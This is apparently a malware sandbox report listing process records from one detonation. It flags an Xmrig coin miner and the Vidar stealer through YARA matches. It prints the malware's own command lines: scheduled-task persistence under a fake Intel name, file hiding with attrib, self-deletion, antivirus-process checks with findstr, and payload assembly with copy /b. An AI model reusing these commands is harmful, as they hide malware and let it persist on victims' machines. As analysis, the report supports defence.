                                                                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                                                                          Start time:19:14:22
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                                                                                                                                                          Imagebase:0x660000
                                                                                                                                                                                                                                                                          File size:468'992 bytes
                                                                                                                                                                                                                                                                          MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                                                          Start time:19:14:22
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                                                                                                                                                          Imagebase:0x660000
                                                                                                                                                                                                                                                                          File size:468'992 bytes
                                                                                                                                                                                                                                                                          MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                                                                                          Start time:19:14:22
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                                                                                                                                                          Imagebase:0x660000
                                                                                                                                                                                                                                                                          File size:468'992 bytes
                                                                                                                                                                                                                                                                          MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                                                          Start time:19:14:22
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:7z.exe e extracted/file_1.zip -oextracted
                                                                                                                                                                                                                                                                          Imagebase:0x660000
                                                                                                                                                                                                                                                                          File size:468'992 bytes
                                                                                                                                                                                                                                                                          MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                                                                                          Start time:19:14:23
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:attrib +H "in.exe"
                                                                                                                                                                                                                                                                          Imagebase:0x7ff650620000
                                                                                                                                                                                                                                                                          File size:23'040 bytes
                                                                                                                                                                                                                                                                          MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                                                          Start time:19:14:23
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"in.exe"
                                                                                                                                                                                                                                                                          Imagebase:0x7ff6dce60000
                                                                                                                                                                                                                                                                          File size:1'827'328 bytes
                                                                                                                                                                                                                                                                          MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                                                                          Start time:19:14:23
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                                                          Imagebase:0x7ff650620000
                                                                                                                                                                                                                                                                          File size:23'040 bytes
                                                                                                                                                                                                                                                                          MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                                                                                          Start time:19:14:23
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                                                          Imagebase:0x7ff650620000
                                                                                                                                                                                                                                                                          File size:23'040 bytes
                                                                                                                                                                                                                                                                          MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:22
                                                                                                                                                                                                                                                                          Start time:19:14:23
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff757150000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:23
                                                                                                                                                                                                                                                                          Start time:19:14:23
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                                                                                                                                                                                                                                                                          Imagebase:0x7ff79d210000
                                                                                                                                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:24
                                                                                                                                                                                                                                                                          Start time:19:14:23
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                                                                                                          Start time:19:14:23
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:powershell ping 127.0.0.1; del in.exe
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                                                                                                          Start time:19:14:23
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:27
                                                                                                                                                                                                                                                                          Start time:19:14:23
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:28
                                                                                                                                                                                                                                                                          Start time:19:14:24
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe"
                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                          File size:863'093 bytes
                                                                                                                                                                                                                                                                          MD5 hash:8EB4F92605E35C57A42B0917C221D65C
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                          • Detection: 8%, ReversingLabs
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:29
                                                                                                                                                                                                                                                                          Start time:19:14:25
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                                                          Imagebase:0x7ff6f8290000
                                                                                                                                                                                                                                                                          File size:1'827'328 bytes
                                                                                                                                                                                                                                                                          MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.2931352333.0000020164CF0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001D.00000003.2931352333.0000020164CF0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                                                          • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 0000001D.00000003.2931352333.0000020164CF0000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                          • Detection: 70%, ReversingLabs
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                                                                                                          Start time:19:14:25
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd
                                                                                                                                                                                                                                                                          Imagebase:0x790000
                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:31
                                                                                                                                                                                                                                                                          Start time:19:14:25
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                                                                                                          Start time:19:14:25
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7abf80000
                                                                                                                                                                                                                                                                          File size:22'528 bytes
                                                                                                                                                                                                                                                                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:33
                                                                                                                                                                                                                                                                          Start time:19:14:26
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:explorer.exe
                                                                                                                                                                                                                                                                          Imagebase:0x7ff674740000
                                                                                                                                                                                                                                                                          File size:5'141'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000021.00000002.2944554300.0000000001239000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000021.00000002.2944554300.000000000125B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000021.00000002.2950378523.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000021.00000002.2950639001.000000014040B000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                                                                                                          Start time:19:14:26
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:tasklist
                                                                                                                                                                                                                                                                          Imagebase:0x300000
                                                                                                                                                                                                                                                                          File size:79'360 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:35
                                                                                                                                                                                                                                                                          Start time:19:14:26
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                                          Imagebase:0x90000
                                                                                                                                                                                                                                                                          File size:29'696 bytes
                                                                                                                                                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:36
                                                                                                                                                                                                                                                                          Start time:19:14:27
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:37
                                                                                                                                                                                                                                                                          Start time:19:14:27
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:38
                                                                                                                                                                                                                                                                          Start time:19:14:28
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:tasklist
                                                                                                                                                                                                                                                                          Imagebase:0x300000
                                                                                                                                                                                                                                                                          File size:79'360 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:39
                                                                                                                                                                                                                                                                          Start time:19:14:28
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                                          Imagebase:0x90000
                                                                                                                                                                                                                                                                          File size:29'696 bytes
                                                                                                                                                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:40
                                                                                                                                                                                                                                                                          Start time:19:14:28
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:cmd /c md 245347
                                                                                                                                                                                                                                                                          Imagebase:0x790000
                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:41
                                                                                                                                                                                                                                                                          Start time:19:14:28
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:findstr /V "profiles" Organizing
                                                                                                                                                                                                                                                                          Imagebase:0x90000
                                                                                                                                                                                                                                                                          File size:29'696 bytes
                                                                                                                                                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:42
                                                                                                                                                                                                                                                                          Start time:19:14:29
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\PING.EXE" 127.1.10.1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7abf80000
                                                                                                                                                                                                                                                                          File size:22'528 bytes
                                                                                                                                                                                                                                                                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:43
                                                                                                                                                                                                                                                                          Start time:19:14:29
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:cmd /c copy /b ..\Judy + ..\Sheets + ..\Another + ..\Wanting b
                                                                                                                                                                                                                                                                          Imagebase:0x790000
                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:44
                                                                                                                                                                                                                                                                          Start time:19:14:29
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:Dry.com b
                                                                                                                                                                                                                                                                          Imagebase:0x20000
                                                                                                                                                                                                                                                                          File size:947'288 bytes
                                                                                                                                                                                                                                                                          MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000002C.00000003.3133503211.0000000004181000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000002C.00000002.3807607263.00000000019D4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000002C.00000002.3807607263.0000000001927000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
